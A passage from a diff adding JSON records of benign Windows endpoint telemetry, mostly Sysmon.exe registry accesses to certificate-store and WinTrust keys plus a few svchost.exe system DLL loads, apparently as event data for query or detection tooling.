"HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570881050000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570881050000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": 
"HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570881050000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "Windows.Storage.OneCore.dll", + "image_path": "C:\\Windows\\System32\\Windows.Storage.OneCore.dll", + "pid": 3980, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883570879020000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570881050000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570881050000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570881050000, + 
"unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570881050000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570881050000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570881050000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570881050000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + 
"registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570881050000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570881050000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570881050000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570881050000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570881050000, + "unique_pid": 
"{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570881050000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570881050000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570881050000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570881050000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + 
"registry_value": "CTLs", + "timestamp": 131883570881050000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570881050000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570881050000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570881050000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570881050000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + 
"registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570881050000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570881050000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570881050000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570881050000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570881050000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": 
"image_load", + "image_name": "WsmAuto.dll", + "image_path": "C:\\Windows\\System32\\WsmAuto.dll", + "pid": 3980, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883570879640000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570881050000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570881050000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570881210000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": 
"HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570881210000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570881210000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570881210000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570881210000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570881210000, + "unique_pid": 
"{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570881210000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570881210000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570881210000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570881210000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": 
"HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570881210000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570881210000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570881210000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570881210000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570881210000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", 
+ "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570881210000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570881210000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570881210000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570881210000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 
131883570881210000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570881210000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570881210000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570881210000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570881210000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "miutils.dll", + "image_path": "C:\\Windows\\System32\\miutils.dll", + "pid": 3980, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + 
"timestamp": 131883570879800000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570881210000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570881210000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570881520000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570881520000, + "unique_pid": 
"{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570881520000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570881520000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": 